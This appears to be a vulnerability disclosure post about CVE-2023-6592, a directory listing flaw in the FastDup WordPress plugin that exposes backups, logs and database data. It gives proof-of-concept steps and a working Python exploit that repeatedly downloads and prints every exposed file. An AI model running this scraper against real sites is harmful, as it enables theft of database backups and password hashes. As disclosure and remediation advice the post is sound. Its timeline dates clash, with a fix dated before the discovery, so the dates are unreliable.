A critical vulnerability has been unearthed within the FastDup – Fastest WordPress Migration & Duplicator plugin, residing in the directory wordpress/wp-content/njt-fastdup/packages. This vulnerability exposes a plethora of information about the WordPress site, encompassing its configuration details, directories, and files. More alarmingly, it allows unauthorized access to sensitive data housed within the database, including user passwords. The severity of this flaw is exemplified by the imminent threat it poses, creating a gateway for potential brute force attacks on password hashes and, consequently, the entire compromise of the system.
Main info:
| CVE | CVE-2023-6592 |
| Plugin | FastDup – Fastest WordPress Migration & Duplicator < 2.2 |
| Critical | Super High |
| All Time | 48 596 |
| Active installations | 4 000+ |
| Publicly Published | January 16, 2023 |
| Last Updated | January 16, 2023 |
| Researcher | Dmtirii Ignatyev |
| OWASP TOP-10 | A3: Sensitive Data Exposure |
| PoC | Yes |
| Exploit | Yes |
| Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6592 https://wpscan.com/vulnerability/a39bb807-b143-4863-88ff-1783e407d7d4/ |
| Plugin Security Certification by CleanTalk |  |
Timeline
| November 22, 2023 | Plugin testing and vulnerability detection in the FastDup – Fastest WordPress Migration & Duplicator have been completed |
| November 22, 2023 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
| January 8, 2023 | The author fixed the vulnerability and released the plugin update |
| January 16, 2023 | Registered CVE-2023-6592 |
Discovery of the Vulnerability
A severe vulnerability has been discovered in the directory wordpress/wp-content/njt-fastdup/packages. This flaw not only exposes extensive information about the site, including its configuration, directories, and files, but more critically, it provides unauthorized access to sensitive data within the database and all data inside. Exploiting this vulnerability poses an imminent threat, leading to potential brute force attacks on password hashes and, subsequently, the compromise of the entire system.
Understanding of Directory Listing attack’s
Directory listing vulnerabilities, such as the one discovered in FastDup, occur when a web server is configured to show the contents of a directory when no index file is present. In WordPress, this can lead to the exposure of sensitive information stored within directories. Real-world examples of this vulnerability include unauthorized access to critical files, configuration details, and in the case of FastDup, the potential compromise of database contents and user passwords.
Exploiting the Directory Listing Vulnerability
Exploiting this directory listing vulnerability involves navigating to the exposed directory, wordpress/wp-content/njt-fastdup/packages, and gaining unauthorized access to the wealth of information contained therein. An attacker could leverage this access to extract sensitive database data, including hashed passwords. The compromised data could then be used in potential brute force attacks, jeopardizing the security of user accounts and, consequently, the entire WordPress system.
POC:
1) Run backup function http://your_site/wordpress/wp-admin/admin.php?page=njt-fastdup#/
2) During backup creation, you can intercept the following paths:
wordpress/wp-content/plugins/fastdup/logs
wordpress/wp-content/njt-fastdup/tmp
3) After backup go to /wordpress/wp-content/njt-fastdup/packages/ and see all backup files inside directory
EXPLOIT (python3):
import requests from bs4 import BeautifulSoup import time url = "http://127.0.0.1/wordpress/wp-content/plugins/fastdup/logs/" def check_files(): # Perform an HTTP request response = requests.get(url) # Check the success of the request if response.status_code == 200: # Use BeautifulSoup to parse the HTML soup = BeautifulSoup(response.text, 'html.parser') # Find all links to files file_links = soup.find_all('a', href=True) if file_links: for link in file_links: file_url = url + link['href'] # Perform an HTTP request to download the file file_response = requests.get(file_url) if file_response.status_code == 200: # Output the file name print("File Name:", link['href']) # Output the file content print("File Content:", file_response.text) print("-" * 50) else: print(f"Failed to retrieve the file {link['href']}") else: print("There are no files in the directory.") else: print(f"Failed to access {url}. Response code: {response.status_code}") # Infinite loop with a check every 3 seconds while True: check_files() time.sleep(3)___
The potential risks associated with this vulnerability are severe and multifaceted. In real-world scenarios, attackers could:
- Unauthorized Access: Attackers can gain unrestricted access to critical information stored within the exposed directory, potentially compromising sensitive data.
- Database Compromise: The vulnerability extends to the database, posing a significant risk of unauthorized access and extraction of sensitive information, including user passwords.
- Brute Force Attacks: The exposed user passwords could be subjected to brute force attacks, leading to unauthorized account access and potential system compromise.
This vulnerability not only jeopardizes the immediate security of the affected WordPress site but could also lead to broader consequences if the compromised data is used maliciously.
Recommendations for Improved Security
- Immediate Patching: Developers should urgently release a patch or update that rectifies this specific directory listing vulnerability.
- Directory Permissions: Review and adjust directory permissions to restrict unauthorized access, preventing directory listing.
- Password Security: Encourage or enforce robust password policies, including the use of strong, unique passwords and periodic changes.
- Security Audits: Conduct thorough security audits to identify and rectify any other potential vulnerabilities within the WordPress system.
By implementing these measures, administrators can significantly enhance the security of their WordPress sites, mitigating the risks associated with the FastDup directory listing vulnerability.
#WordPressSecurity #DirectoryLisitng #WebsiteSafety #StayProtected #SuperHighVulnerability
Use CleanTalk solutions to improve the security of your website
DMITRII I.
